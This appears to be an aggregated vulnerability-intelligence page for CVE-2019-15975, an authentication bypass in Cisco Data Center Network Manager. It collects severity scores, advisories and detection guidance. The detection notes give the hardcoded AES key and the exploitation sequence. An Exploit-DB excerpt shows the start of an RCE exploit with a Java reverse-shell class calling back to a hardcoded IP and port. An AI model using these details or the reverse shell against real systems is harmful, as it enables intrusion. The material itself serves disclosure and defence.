CVE-2019-15975
Published 2020-01-06
CVE-2019-15975: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass…
Priority: P1 91 · Severity: critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 85.65% (99.7th percentile)
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_data_center_network_manager | >= unspecified < n/a | n/a |
| cisco | data_center_network_manager | < 11.3\(1\) | 11.3\(1\) |
| cisco | data_center_network_manager | — | — |
Detection & IOCs (extracted from sources)
- Detect unauthenticated POST requests to /fm/fmrest/dbadmin/addUser with a crafted 'afw-token' header: this is the auth bypass endpoint used to add a global-admin account without prior authentication.
- The exploit forges an AES-CBC encrypted token using the hardcoded key 's91zEQmb305F!90a' with a zero IV and the prefix 'Source Incite'. Detecting this token pattern in the 'afw-token' HTTP header is a strong indicator of exploitation.
- Alert on POST requests to the /LogonWSService/LogonWS SOAP endpoint immediately followed by requests to /fm/fmrest/dbadmin/addUser from the same source IP: this sequence indicates the two-stage auth bypass and admin account creation.
- Use Cisco Talos Snort SIDs 52530–52547 to detect exploitation attempts against CVE-2019-15975, CVE-2019-15976, and CVE-2019-15977 in Cisco DCNM.
- The AES encryption uses a hardcoded key and a zero IV; the token also embeds the server's current time (leaked via the HTTP Date response header). The exploit loops to handle a race condition in InheritableThreadLocal.childValue, so multiple rapid requests to the auth bypass endpoint may be observed before a successful bypass.
- There are no workarounds available for these vulnerabilities; only vendor-supplied software updates address CVE-2019-15975.
- A public Proof of Concept and a Metasploit module exist for this vulnerability, significantly lowering the bar for exploitation.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vendor_cisco | — | 9.8 | CRITICAL | — |
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco · 2020-01-02 · CVSS 9.8 · CVE-2019-15975 [CRITICAL] · CWE-798
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.
For more information about these vulnerabilities, see the Details section of this advisory.
Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco · CVSS 3.0 · CVE-2019-15975
CVSS: 3.0
CWE: CWE-798
Bug IDs: CSCvq85945, CSCvq89859, CSCvq89898
GHSA
GHSA-m469-jmc4-66pp: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker
ghsa_unreviewed · 2022-05-24 · CVE-2019-15975 [HIGH] · CWE-798
No detection rules found.
Exploit-DB
Cisco Data Center Network Manager 11.2 - Remote Code Execution
exploitdb · 2020-02-06 · CVSS 9.8 · CVE-2019-15975 [CRITICAL]
---
```python
#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5

Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100

Notes:
Si.java needs to be compiled against Java 8 (the target used 1.8u201):

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Si {
    static {
        try {
            String host = "192.168.100.159";
            int port = 1337;
            String cmd =
```
Metasploit
Cisco DCNM auth bypass
metasploit
This exploit is able to add an admin account to a Cisco DCNM with credentials of your choosing. After that, you can log in to the web interface with those credentials. The only precondition is that an administrator has logged in fairly recently, because the exploit relies on a form of session stealing.
Checkpoint
20th January – Threat Intelligence Bulletin
blogs_checkpoint · 2020-01-20 · CVE-2020-0601
## 20th January – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 20th January 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Hackers have stolen personal information in an attack on the Australian P&N bank. The attack focused on the bank’s CRM system, which stored a great deal of sensitive personal and financial information. Australia has also experienced a data breach of a bushfire donation site: hackers abused the outdated Magento CMS u
Talos
Threat Source newsletter (Jan. 9, 2019)
blogs_talos · 2020-01-09
## Threat Source newsletter (Jan. 9, 2019)
Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We’re back after a long break for the holidays. And 2020 is already off to a fast start as tensions continue to rise in the Middle East.
We’ve gotten a lot of questions about whether customers and users should be concerned about cyber attacks from Iran after they’ve exchanged missile strikes with the U.S. But the reality of the situation is, if you haven’t already been preparing for attacks from state-sponsored actors, it’s already too late. We run down our thoughts on the situation here.
We also have our first Beers with Talos episode of the new year out, where the guys run down the top threats of 2019 and talk about what less
Tenable
CVE-2019-15975, CVE-2019-15976, CVE-2019-15977: Critical Authentication Bypass Vulnerabilities in Cisco Data Center Network Manager
blogs_tenable · 2020-01-02 · CVSS 9.8 · [CRITICAL]
References
- http://packetstormsecurity.com/files/156238/Cisco-Data-Center-Network-Manager-11.2-Remote-Code-Execution.html
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass